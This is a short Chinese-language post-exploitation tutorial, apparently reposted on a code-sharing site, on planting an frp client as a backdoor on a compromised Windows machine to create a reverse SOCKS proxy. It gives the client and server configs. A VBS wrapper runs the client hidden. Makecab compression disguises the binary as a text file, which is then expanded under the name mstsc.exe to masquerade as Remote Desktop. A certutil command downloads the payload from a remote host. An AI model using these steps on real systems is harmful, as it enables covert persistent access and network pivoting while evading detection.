[后滲透] frp 創建反向socks代理


后門文件配置:

#frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = 123456

[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5
#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =7000
token = 123456
#frpc.bat
frpc.exe -c frpc.ini

#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide

壓縮解壓:
減少文件體積,提高文件上傳速度,這里為了方便直接可以使用windows自帶的壓縮解壓工具:

#壓縮
makecab frpc.exe frpc.txt

#解壓
expand C:\Users\RabbitMask\Desktop\test\frpc.txt C:\Users\RabbitMask\Desktop\test\mstsc.exe

遠程下載:

certutil -urlcache -split -f http://192.168.1.1/frpc.txt  1.txt


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM